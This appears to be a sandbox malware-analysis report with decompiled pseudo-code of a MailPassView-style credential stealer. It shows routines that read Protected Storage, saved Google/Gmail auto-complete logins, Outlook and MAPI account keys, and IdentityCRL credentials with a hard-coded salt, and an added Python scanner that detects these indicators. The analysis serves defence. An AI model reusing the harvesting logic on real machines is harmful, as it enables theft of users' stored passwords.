                                                                                                                                                                        								_t87 = E0040BAB7( &_v904, __eflags);
                                                                                                                                                                        								__eflags = _t87;
                                                                                                                                                                        								if(_t87 == 0) {
                                                                                                                                                                        									_t101 = 0;
                                                                                                                                                                        									__eflags = 0;
                                                                                                                                                                        									goto L13;
                                                                                                                                                                        								}
                                                                                                                                                                        								_push(_v28);
                                                                                                                                                                        								_v904 = 0x41457c;
                                                                                                                                                                        								L00412096();
                                                                                                                                                                        								__eflags = _v304;
                                                                                                                                                                        								if(_v304 != 0) {
                                                                                                                                                                        									DeleteObject(_v304);
                                                                                                                                                                        									_v308 = _v308 & 0x00000000;
                                                                                                                                                                        								}
                                                                                                                                                                        								goto L27;
                                                                                                                                                                        							}
                                                                                                                                                                        							MessageBoxA(0, "Failed to load the executable file !", "Error", 0x30);
                                                                                                                                                                        							goto L25;
                                                                                                                                                                        						}
                                                                                                                                                                        						RegDeleteKeyA(0x80000001, 0x41344f);
                                                                                                                                                                        						goto L25;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						 *0x418488 = 0x417b28;
                                                                                                                                                                        						E004084D8();
                                                                                                                                                                        						L25:
                                                                                                                                                                        						_push(_v32);
                                                                                                                                                                        						_v908 = 0x41457c;
                                                                                                                                                                        						L00412096();
                                                                                                                                                                        						__eflags = _v308 - _t101;
                                                                                                                                                                        						if(_v308 != _t101) {
                                                                                                                                                                        							DeleteObject(_v308);
                                                                                                                                                                        							_v312 = _t101;
                                                                                                                                                                        						}
                                                                                                                                                                        						L27:
                                                                                                                                                                        						_v908 = 0x41346c;
                                                                                                                                                                        						E00406A7D( &_v988);
                                                                                                                                                                        						E00404638( &_v956);
                                                                                                                                                                        						E00406A7D( &_v988);
                                                                                                                                                                        						_t73 = 0;
                                                                                                                                                                        						__eflags = 0;
                                                                                                                                                                        						goto L28;
                                                                                                                                                                        					}
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t73 = _t49 + 1;
                                                                                                                                                                        					L28:
                                                                                                                                                                        					return _t73;
                                                                                                                                                                        				}
                                                                                                                                                                        			}

0x0040bb8d
0x0040bb9f
0x0040bba4
0x0040bbab
0x0040bbb3
0x0040bbbc
0x0040bbc1
0x0040bbc7
0x0040bbcf
0x0040bbd3
0x0040bbd7
0x0040bbdb
0x0040bbdf
0x0040bbec
0x0040bbf3
0x0040bc04
0x0040bc09
0x0040bc0b
0x0040bc21
0x0040bc32
0x0040bc37
0x0040bc39
0x0040bc5c
0x0040bc66
0x0040bc6c
0x0040bc76
0x0040bc97
0x0040bc9b
0x0040bce9
0x0040bcea
0x0040bcf5
0x0040bcfa
0x0040bd02
0x0040bd08
0x0040bd04
0x0040bd04
0x0040bd04
0x0040bd11
0x0040bd1e
0x0040bd32
0x0040bd3d
0x0040bd50
0x0040bd52
0x0040bd54
0x0040bdc4
0x0040bdc4
0x00000000
0x0040bd56
0x0040bd5c
0x0040bd6f
0x0040bd75
0x0040bd77
0x00000000
0x00000000
0x0040bd79
0x0040bd7e
0x0040bd80
0x0040bd8e
0x0040bd9a
0x0040bd9c
0x0040bd9e
0x0040bda5
0x0040bdb0
0x0040bdb0
0x00000000
0x0040bd9e
0x0040bd88
0x0040bd8a
0x0040bd8c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040bdb6
                                                                                                                                                                        0x0040bdbe
                                                                                                                                                                        0x0040bdc0
                                                                                                                                                                        0x0040bdc0
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040bd5c
                                                                                                                                                                        0x0040bd54
                                                                                                                                                                        0x0040bca1
                                                                                                                                                                        0x0040bca6
                                                                                                                                                                        0x0040bca8
                                                                                                                                                                        0x0040bce7
                                                                                                                                                                        0x0040bce7
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040bce7
                                                                                                                                                                        0x0040bcaa
                                                                                                                                                                        0x0040bcb1
                                                                                                                                                                        0x0040bcb9
                                                                                                                                                                        0x0040bcbe
                                                                                                                                                                        0x0040bcc7
                                                                                                                                                                        0x0040bcd4
                                                                                                                                                                        0x0040bcda
                                                                                                                                                                        0x0040bcda
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040bcc7
                                                                                                                                                                        0x0040bc85
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040bc85
                                                                                                                                                                        0x0040bc45
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040bc0d
                                                                                                                                                                        0x0040bc0d
                                                                                                                                                                        0x0040bc17
                                                                                                                                                                        0x0040bdca
                                                                                                                                                                        0x0040bdca
                                                                                                                                                                        0x0040bdd1
                                                                                                                                                                        0x0040bdd9
                                                                                                                                                                        0x0040bdde
                                                                                                                                                                        0x0040bde6
                                                                                                                                                                        0x0040bdef
                                                                                                                                                                        0x0040bdf5
                                                                                                                                                                        0x0040bdf5
                                                                                                                                                                        0x0040bdfc
                                                                                                                                                                        0x0040be00
                                                                                                                                                                        0x0040be08
                                                                                                                                                                        0x0040be11
                                                                                                                                                                        0x0040be1a
                                                                                                                                                                        0x0040be1f
                                                                                                                                                                        0x0040be1f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040be1f
                                                                                                                                                                        0x0040bbad
                                                                                                                                                                        0x0040bbad
                                                                                                                                                                        0x0040be21
                                                                                                                                                                        0x0040be27
                                                                                                                                                                        0x0040be27

APIs
  • Part of subcall function 00404841: LoadLibraryA.KERNEL32(comctl32.dll,73B74DE0,?,00000000,?,?,?,0040BBA9,73B74DE0), ref: 00404860
  • Part of subcall function 00404841: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404872
  • Part of subcall function 00404841: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040BBA9,73B74DE0), ref: 00404886
  • Part of subcall function 00404841: MessageBoxA.USER32 ref: 004048B1
• ??3@YAXPAX@Z.MSVCRT ref: 0040BDD9
• DeleteObject.GDI32(?), ref: 0040BDEF
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
• String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
• API String ID: 745651260-375988210
• Opcode ID: e1159f30e00c98f05f2d67921a14677ae0d548148ce7ab1f7a7c6c893690e61f
• Instruction ID: 8d811f0c9aed7e5f9a0d70865fafe098279c62815184764300974fb8b6b83255
• Opcode Fuzzy Hash: e1159f30e00c98f05f2d67921a14677ae0d548148ce7ab1f7a7c6c893690e61f
• Instruction Fuzzy Hash: A8618C71508345ABC720AFA1DC49A9BBBF9FF84705F00483FF545A22A0DB789904CB5E
Uniqueness

Uniqueness Score: -1.00%
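The strings this report records for the MailPassView component (the NirSoft-style "/deleteregkey" and "/savelangfile" switches in the String ID above, and in the E00403C17 routine that follows: the Protected Storage loader pstorec.dll with PStoreCreateInstance, the Internet Explorer auto-complete item names for Google logins, and the Outlook Express, Outlook and MAPI account keys under HKEY_CURRENT_USER) are what a triage script would look for in the unpacked 0x400000 dump. The scanner below is an added example, not code from the report, from Joe Sandbox or from NirSoft; because the .sdmp files are not on this page it runs against a constructed buffer that embeds those strings in the encodings the decompiler shows (the Google item names as UTF-16LE, the rest as ASCII). The indicator names, the verdict thresholds and the sample buffers are the editor's choices.

```python
"""Scan a memory dump for the MailPassView-style credential-store indicators
seen in E00403C17. Added example with constructed inputs; not the report's tooling."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Narrow (ASCII) strings exactly as the decompiled routine references them.
ASCII_INDICATORS: dict[str, bytes] = {
    "pstorec_dll": b"pstorec.dll",
    "pstore_create_instance": b"PStoreCreateInstance",
    "oe_accounts": b"Software\\Microsoft\\Internet Account Manager\\Accounts",
    "outlook_omi_accounts": b"Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts",
    "mapi_profiles_nt": b"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles",
    "mapi_profiles_9x": b"Software\\Microsoft\\Windows Messaging Subsystem\\Profiles",
    "nirsoft_switch": b"/savelangfile",  # from the String ID of the listing above
}

# Wide strings: the decompiler shows these with the L"" prefix, so they are UTF-16LE in memory.
WIDE_INDICATORS: dict[str, str] = {
    "ie_autocomplete_gmail": "www.google.com/Please log in to your Gmail account",
    "ie_autocomplete_gmail_443": "www.google.com:443/Please log in to your Gmail account",
    "ie_autocomplete_google": "www.google.com/Please log in to your Google Account",
    "ie_autocomplete_google_443": "www.google.com:443/Please log in to your Google Account",
}

MAIL_ACCOUNT_KEYS = {"oe_accounts", "outlook_omi_accounts", "mapi_profiles_nt", "mapi_profiles_9x"}


@dataclass
class ScanResult:
    hits: dict[str, list[int]] = field(default_factory=dict)  # indicator -> byte offsets

    @property
    def uses_protected_storage(self) -> bool:
        # The routine needs both: it loads the DLL and resolves the factory before doing anything.
        return "pstorec_dll" in self.hits and "pstore_create_instance" in self.hits

    @property
    def mail_keys_hit(self) -> int:
        return len(MAIL_ACCOUNT_KEYS & set(self.hits))

    @property
    def verdict(self) -> str:
        # Thresholds are the editor's choice: the PStore pair plus two distinct mail-client
        # account locations is the combination E00403C17 exhibits; anything less is only a lead.
        if self.uses_protected_storage and self.mail_keys_hit >= 2:
            return "mail-credential-harvester"
        return "suspicious" if self.hits else "clean"


def _find_all(buf: bytes, needle: bytes) -> list[int]:
    return [m.start() for m in re.finditer(re.escape(needle), buf)]


def scan(buf: bytes) -> ScanResult:
    """Return every indicator found in buf with its offsets; wide strings are searched as UTF-16LE."""
    result = ScanResult()
    for name, needle in ASCII_INDICATORS.items():
        if offsets := _find_all(buf, needle):
            result.hits[name] = offsets
    for name, text in WIDE_INDICATORS.items():
        if offsets := _find_all(buf, text.encode("utf-16-le")):
            result.hits[name] = offsets
    return result


def build_sample_dump() -> bytes:
    """Constructed stand-in for the 0x400000 dump: the routine's strings between filler bytes."""
    parts = [b"\x00" * 64]
    for name in ("pstorec_dll", "pstore_create_instance"):
        parts.append(ASCII_INDICATORS[name] + b"\x00")
    parts += [text.encode("utf-16-le") + b"\x00\x00" for text in WIDE_INDICATORS.values()]
    for name in sorted(MAIL_ACCOUNT_KEYS):
        parts.append(ASCII_INDICATORS[name] + b"\x00")
    parts.append(b"/deleteregkey\x00/savelangfile\x00" + b"\x90" * 32)
    return b"".join(parts)


def build_partial_dump() -> bytes:
    """Constructed: a program that only links pstorec.dll and touches no mail-account keys."""
    return b"\x00" * 16 + b"pstorec.dll\x00Hello, world\x00"


if __name__ == "__main__":
    for label, buf in (("sample", build_sample_dump()), ("partial", build_partial_dump())):
        r = scan(buf)
        print(f"{label}: {r.verdict}; mail keys hit = {r.mail_keys_hit}")
        for name, offsets in sorted(r.hits.items()):
            print(f"  {name:28s} @ {[hex(o) for o in offsets]}")
```

To run it on a real dump, pass the bytes of the .sdmp file to scan(). Because the harvester verdict requires both the PStore loader pair and at least two distinct mail-account keys, a program that merely links pstorec.dll is reported as suspicious, not as a harvester, and the per-indicator offsets give you something to jump to in the dump.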

Control-flow Graph

C-Code - Quality: 67%
E00403C17(signed int __ecx, void* __eflags, void* __fp0) {
	char _v8;
	void* __edi;
	void* __esi;
	struct HINSTANCE__* _t42;
	void* _t56;
	void* _t58;
	void* _t60;
	void* _t62;
	void* _t64;
	void* _t66;
	char* _t79;
	void* _t82;
	_Unknown_base(*)()* _t93;
	void* _t94;
	void* _t96;
	void* _t104;
	signed int _t106;
	char* _t114;
	_Unknown_base(*)()* _t130;
	void* _t142;

	_t142 = __fp0;
	_t98 = __ecx;
	_push(__ecx);
	_t106 = __ecx;
	_t96 = __ecx + 0x87c;
	*(_t96 + 0xc) = *(_t96 + 0xc) & 0x00000000;
	E0040EF05(_t96);
	// Legacy Protected Storage (PStore): where Internet Explorer (before IE7) and
	// Outlook Express kept saved passwords and auto-complete data.
	_t42 = LoadLibraryA("pstorec.dll"); // executed
	*(_t96 + 8) = _t42;
	if(_t42 == 0) {
		L4:
		E0040EF05(_t96);
	} else {
		_t93 = GetProcAddress(_t42, "PStoreCreateInstance");
		_t130 = _t93;
		_t98 = 0 | _t130 != 0x00000000;
		*(_t96 + 0x10) = _t93;
		// As emitted, the branch sense reads inverted: the call through _t93 below sits on
		// the path where GetProcAddress returned NULL. Decompiler artifact; the real code
		// can only call the factory when the export was resolved.
		if(_t130 != 0) {
			goto L4;
		} else {
			_t98 = _t96 + 4;
			_t94 = *_t93(_t96 + 4, 0, 0, 0); // PStoreCreateInstance(&IPStore, 0, 0, 0)
			_t132 = _t94;
			if(_t94 != 0) {
				goto L4;
			} else {
				*(_t96 + 0xc) = 1; // IPStore interface obtained
			}
		}
	}
	E004047AA(_t106 + 0x890, _t132);
	// Protected Storage item names under which IE auto-complete saved Google/Gmail logins
	// (plain and :443 variants of the same two prompts).
	E004036A6(_t98, _t106, _t106 + 0x890, _t142, L"www.google.com/Please log in to your Gmail account");
	E004036A6(_t98, _t106, _t106 + 0x890, _t142, L"www.google.com:443/Please log in to your Gmail account");
	E004036A6(_t98, _t106, _t106 + 0x890, _t142, L"www.google.com/Please log in to your Google Account");
	E004036A6(_t98, _t106, _t106 + 0x890, _t142, L"www.google.com:443/Please log in to your Google Account");
	_push(_t106 + 0x858); // executed
	E004076B7(_t98, _t132); // executed
	E00407306(_t98, _t106 + 0x86c); // executed
	E004077C5(_t132, _t106 + 0x878); // executed
	// 0x80000001 is HKEY_CURRENT_USER. This key is the Outlook Express / Windows Mail account store.
	_t56 = E0040F1B0(0x80000001, "Software\\Microsoft\\Internet Account Manager\\Accounts", &_v8);
	_t133 = _t56;
	if(_t56 == 0) {
		E00402B92(_t98, &_v8, _t133, _t142, _t106, 1);
	}
	// Outlook 98/2000 "Internet Mail Only" mode account store.
	_t58 = E0040F1B0(0x80000001, "Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts", &_v8);
	_t134 = _t58;
	if(_t58 == 0) {
		E00402B92(_t98, &_v8, _t134, _t142, _t106, 5);
	}
	E00402C1E(_t98, _t142, _t106); // executed
	*((intOrPtr*)(_t106 + 0xb1c)) = 6;
	_t60 = E00406282();
	_push(&_v8);
	// MAPI (Outlook) profile key; the path differs by Windows family. The compare at +0x10
	// is consistent with OSVERSIONINFO.dwPlatformId, where 1 == VER_PLATFORM_WIN32_WINDOWS
	// (Windows 9x/ME) and the NT path is taken for everything else.
	if( *((intOrPtr*)(_t60 + 0x10)) != 1) {
		_push("Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles");
	} else {
		_push("Software\\Microsoft\\Windows Messaging Subsystem\\Profiles");
                                                                                                                                                                        				}
                                                                                                                                                                        				_push(0x80000001);
                                                                                                                                                                        				_t62 = E0040F1B0();
                                                                                                                                                                        				_t136 = _t62;
                                                                                                                                                                        				if(_t62 != 0) {
                                                                                                                                                                        					 *((char*)(_t106 + 0xa9c)) = 0;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					E00402AE3( &_v8, _t136, _t142, _t106);
                                                                                                                                                                        				}
                                                                                                                                                                        				 *((intOrPtr*)(_t106 + 0xb1c)) = 0xf;
                                                                                                                                                                        				_t64 = E0040F1B0(0x80000001, "Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles",  &_v8);
                                                                                                                                                                        				_t137 = _t64;
                                                                                                                                                                        				if(_t64 != 0) {
                                                                                                                                                                        					 *((char*)(_t106 + 0xa9c)) = 0;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					E00402AE3( &_v8, _t137, _t142, _t106);
                                                                                                                                                                        				}
                                                                                                                                                                        				 *((intOrPtr*)(_t106 + 0xb1c)) = 0x10;
                                                                                                                                                                        				_t66 = E0040F1B0(0x80000001, "Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles",  &_v8);
                                                                                                                                                                        				_t138 = _t66;
                                                                                                                                                                        				if(_t66 != 0) {
                                                                                                                                                                        					 *((char*)(_t106 + 0xa9c)) = 0;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					E00402AE3( &_v8, _t138, _t142, _t106);
                                                                                                                                                                        				}
                                                                                                                                                                        				E0040EF1C(_t96);
                                                                                                                                                                        				E004047FB(_t106 + 0x890);
                                                                                                                                                                        				E00402F9C(_t106, _t98, _t142, 0x80000001); // executed
                                                                                                                                                                        				E00402F9C(_t106, _t98, _t142, 0x80000002); // executed
                                                                                                                                                                        				E00403278(_t142, _t106);
                                                                                                                                                                        				E004034A5(_t98, _t138, _t142, _t106); // executed
                                                                                                                                                                        				E00403946(_t138, _t142, _t106); // executed
                                                                                                                                                                        				E0040378B(_t98, _t106, _t142, _t106); // executed
                                                                                                                                                                        				_t79 = _t106 + 0xb20;
                                                                                                                                                                        				_t139 =  *_t79;
                                                                                                                                                                        				if( *_t79 != 0) {
                                                                                                                                                                        					 *((intOrPtr*)(_t106 + 0xf34)) = 0xa;
                                                                                                                                                                        					E0040D9D8(_t106 + 0x1c8, _t104, _t139, _t79, 0);
                                                                                                                                                                        				}
                                                                                                                                                                        				_t114 = _t106 + 0xc25;
                                                                                                                                                                        				_t140 =  *_t114;
                                                                                                                                                                        				if( *_t114 != 0) {
                                                                                                                                                                        					strcpy(_t106 + 0x52a, _t106 + 0xe2f);
                                                                                                                                                                        					 *((intOrPtr*)(_t106 + 0xf34)) = 0xb;
                                                                                                                                                                        					E0040D9D8(_t106 + 0x1c8, _t104, _t140, _t114, 0);
                                                                                                                                                                        				}
                                                                                                                                                                        				_push(_t106 + 0x640); // executed
                                                                                                                                                                        				E0040E057(_t140); // executed
                                                                                                                                                                        				E0040DEC3(_t106 + 0x640);
                                                                                                                                                                        				_t82 = E004113C4(_t106 + 0x870, _t106 + 0x870); // executed
                                                                                                                                                                        				return _t82;
                                                                                                                                                                        			}

APIs
  • Part of subcall function 0040EF05: FreeLibrary.KERNELBASE(?,0040EF39,?,?,?,?,?,?,00404221), ref: 0040EF11
• LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C36
• GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4B
• strcpy.MSVCRT(?,?), ref: 00403E55
Strings
• pstorec.dll, xrefs: 00403C31
• Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD7
• www.google.com/Please log in to your Gmail account, xrefs: 00403C87
• www.google.com/Please log in to your Google Account, xrefs: 00403C9B
• Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6F
• Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D43
• www.google.com:443/Please log in to your Google Account, xrefs: 00403CA5
• PStoreCreateInstance, xrefs: 00403C45
• www.google.com:443/Please log in to your Gmail account, xrefs: 00403C91
• Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3C
• Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA5
• Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFC
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: Library$AddressFreeLoadProcstrcpy
• String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
• API String ID: 2884822230-317895162
• Opcode ID: edd8b6eb8bcfee5f27bfe3d894378078f305261ef97242b4e9c725312b665777
• Instruction ID: c79aa312a60a802310c0dbcdda9968b0b76b201639e98401828b305836cf62c0
• Opcode Fuzzy Hash: edd8b6eb8bcfee5f27bfe3d894378078f305261ef97242b4e9c725312b665777
• Instruction Fuzzy Hash: BE51C472604601BAD710AF72CC46FDABA6CAF01709F14017FF905B61C2EB7DAB548A99
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 231 40e057-40e08c call 412360 RegOpenKeyExA 234 40e092-40e0a6 RegOpenKeyExA 231->234 235 40e18e-40e194 231->235 236 40e184-40e188 RegCloseKey 234->236 237 40e0ac-40e0d5 RegQueryValueExA 234->237 236->235 238 40e17a-40e17e RegCloseKey 237->238 239 40e0db-40e0ea call 4047aa 237->239 238->236 239->238 242 40e0f0-40e128 call 40481b 239->242 242->238 245 40e12a-40e132 242->245 246 40e170-40e174 LocalFree 245->246 247 40e134-40e16b memcpy * 2 call 40dd59 245->247 246->238 247->246
C-Code - Quality: 96%
    /* Decompiler output (Joe Sandbox IDA plugin). Reads the value
       HKCU\Software\Microsoft\IdentityCRL\Dynamic Salt\Value and hands it,
       together with a hard-coded 0x40-byte wide string, to E0040DD59, which
       in turn enumerates the IdentityCRL "Creds" subkeys (see the API list). */
    E0040E057(void* __eflags, void* _a4, int _a8, int _a12, void* _a16, char _a20, void* _a24, int _a28, void* _a32, int _a36, void _a40, void _a104) {
        void* _v0;   /* HKEY for Software\Microsoft\IdentityCRL */
        void* __esi;
        long _t34;
        long _t36;
        long _t40;
        void* _t63;  /* declared here: used below but left undeclared by the decompiler */
        void* _t64;
        void* _t68;
        int _t73;
        long _t81;   /* declared here: carries the RegQueryValueExA result into E004047AA */

        E00412360(0x102c, _t64);
        _t34 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\IdentityCRL", 0, 0x20019,  &_v0); // executed
        if(_t34 != 0) {
            L10:
            return _t34;
        }
        _t36 = RegOpenKeyExA(_v0, "Dynamic Salt", 0, 0x20019,  &_a4); // executed
        if(_t36 != 0) {
            L9:
            _t34 = RegCloseKey(_v0); // executed
            goto L10;
        }
        _a8 = 0x1000;  /* buffer size passed to RegQueryValueExA */
        _t40 = RegQueryValueExA(_a4, "Value", 0,  &_a36,  &_a40,  &_a8);
        _t81 = _t40;
        if(_t40 == 0) {
            _t63 = _a4 + 0xc;
            if(E004047AA(_a4 + 0xc, _t81) != 0) {
                _a20 = _a8;
                _a24 =  &_a40;
                _t73 = 0x40;
                _t68 = L"%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd";
                _a28 = _t73;
                _a32 = _t68;
                if(E0040481B(_t63,  &_a20,  &_a28,  &_a12) != 0) {
                    if(_a12 < 0x400) {
                        memcpy( &_a40, _t68, _t73);
                        memcpy( &_a104, _a16, _a12);
                        E0040DD59(_t64, _a12 + _t73, _a4,  &_a40, _a12 + _t73, _v0);
                    }
                    LocalFree(_a16);
                }
            }
        }
        RegCloseKey(_a4);
        goto L9;
    }

APIs
• RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E80,?), ref: 0040E088
• RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E80,?), ref: 0040E0A2
• RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E80,?), ref: 0040E0CD
• RegCloseKey.ADVAPI32(?,?,?,?,?,00403E80,?), ref: 0040E17E
  • Part of subcall function 004047AA: LoadLibraryA.KERNELBASE(?,0040DC6C,80000001,73AFF420), ref: 004047B2
  • Part of subcall function 004047AA: GetProcAddress.KERNEL32(00000000,?), ref: 004047CA
• memcpy.MSVCRT ref: 0040E13B
• memcpy.MSVCRT ref: 0040E150
  • Part of subcall function 0040DD59: RegOpenKeyExA.ADVAPI32(p@,Creds,00000000,00020019,p@,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040E170,?,?,?,?), ref: 0040DD83
  • Part of subcall function 0040DD59: memset.MSVCRT ref: 0040DDA1
  • Part of subcall function 0040DD59: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040DEA5
  • Part of subcall function 0040DD59: RegCloseKey.ADVAPI32(?), ref: 0040DEB6
• LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E80,?), ref: 0040E174
• RegCloseKey.KERNELBASE(?,?,?,?,?,00403E80,?), ref: 0040E188
Strings
Memory Dump Source
• Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
• String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
• API String ID: 2768085393-1693574875
• Opcode ID: 7df82dd4f7763ce5193550669c390a20838b5133b5989fa9b4096a2fc0febe08
• Instruction ID: a1b69f5673053fc040be98c60ebfc88e8990dfc0172556f981ec686efddd513d
• Opcode Fuzzy Hash: 7df82dd4f7763ce5193550669c390a20838b5133b5989fa9b4096a2fc0febe08
• Instruction Fuzzy Hash: 99313CB2504305AFD700DF51DC40E9BBBECEF88798F00493AFA94E2160D775DA598B6A
Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

C-Code - Quality: 82%
_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
    struct HINSTANCE__* _t33;
    intOrPtr* _t35;
    intOrPtr* _t36;
    void* _t39;
    void _t41;
    intOrPtr _t48;
    signed int _t50;
    int _t52;
    intOrPtr _t55;
    signed int _t56;
    signed int _t57;
    intOrPtr _t62;
    intOrPtr _t63;
    intOrPtr* _t65;
    intOrPtr* _t69;
    int _t70;
    void* _t71;
    intOrPtr _t79;

    _push(0x70);
    _push(0x4133e0);
    E00412308(__ebx, __edi, __esi);
    _t33 = GetModuleHandleA(0);
    if(_t33->i != 0x5a4d) {
        L4:
        *(_t71 - 0x1c) = 0;
    } else {
        _t65 = *((intOrPtr*)(_t33 + 0x3c)) + _t33;
        if(*_t65 != 0x4550) {
            goto L4;
        } else {
            _t56 = *(_t65 + 0x18) & 0x0000ffff;
            if(_t56 == 0x10b) {
                __eflags = *((intOrPtr*)(_t65 + 0x74)) - 0xe;
                if(*((intOrPtr*)(_t65 + 0x74)) <= 0xe) {
                    goto L4;
                } else {
                    _t57 = 0;
                    __eflags = *(_t65 + 0xe8);
                    goto L9;
                }
            } else {
                if(_t56 == 0x20b) {
                    __eflags = *((intOrPtr*)(_t65 + 0x84)) - 0xe;
                    if(*((intOrPtr*)(_t65 + 0x84)) <= 0xe) {
                        goto L4;
                    } else {
                        _t57 = 0;
                        __eflags = *(_t65 + 0xf8);
                        L9:
                        _t9 = __eflags != 0;
                        __eflags = _t9;
                        *(_t71 - 0x1c) = _t57 & 0xffffff00 | _t9;
                    }
                } else {
                    goto L4;
                }
            }
        }
    }
    *(_t71 - 4) = 0;
    __set_app_type(2);
    *0x418b6c = *0x418b6c | 0xffffffff;
    *0x418b70 = *0x418b70 | 0xffffffff;
    _t35 = __p__fmode();
    _t62 = *0x417b8c; // 0x0
    *_t35 = _t62;
    _t36 = __p__commode();
    _t63 = *0x417b88; // 0x0
    *_t36 = _t63;
    *0x418b68 = *_adjust_fdiv;
    _t39 = E00412304();
    _t79 = *0x417000; // 0x1
    if(_t79 == 0) {
        __setusermatherr(E00412304);
        _pop(_t63);
    }
    E004122F2(_t39);
    _push(0x4133b4);
    _push(0x4133b0);
    L004122EC();
    _t41 = *0x417b84; // 0x0
    *(_t71 - 0x20) = _t41;
    *(_t71 - 0x30) = __getmainargs(_t71 - 0x2c, _t71 - 0x28, _t71 - 0x24, *0x417b80, _t71 - 0x20);
    _push(0x4133ac);
    _push(0x413398); // executed
    L004122EC(); // executed
    _t69 = *_acmdln;
    *((intOrPtr*)(_t71 - 0x34)) = _t69;
    if(*_t69 != 0x22) {
        while(1) {
            __eflags = *_t69 - 0x20;
            if(__eflags <= 0) {
                goto L17;
            }
            _t69 = _t69 + 1;
            *((intOrPtr*)(_t71 - 0x34)) = _t69;
        }
    } else {
        do {
            _t69 = _t69 + 1;
            *((intOrPtr*)(_t71 - 0x34)) = _t69;
            _t55 = *_t69;
        } while (_t55 != 0 && _t55 != 0x22);
        if(*_t69 == 0x22) {
            L16:
            _t69 = _t69 + 1;
            *((intOrPtr*)(_t71 - 0x34)) = _t69;
        }
    }
    L17:
    _t48 = *_t69;
    if(_t48 != 0 && _t48 <= 0x20) {
        goto L16;
    }
    *(_t71 - 0x4c) = 0;
    GetStartupInfoA(_t71 - 0x78);
    _t87 = *(_t71 - 0x4c) & 0x00000001;
    if((*(_t71 - 0x4c) & 0x00000001) == 0) {
        _t50 = 0xa;
    } else {
        _t50 = *(_t71 - 0x48) & 0x0000ffff;
    }
    _t52 = E0040BB8D(_t63, _t87, GetModuleHandleA(0), 0, _t69, _t50); // executed
    _t70 = _t52;
    *(_t71 - 0x7c) = _t70;
    if(*(_t71 - 0x1c) == 0) {
        exit(_t70); // executed
    }
    __imp___cexit();
    *(_t71 - 4) = *(_t71 - 4) | 0xffffffff;
    return E00412341(_t70);
}
                                                                                                                                                                        0x00412180
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
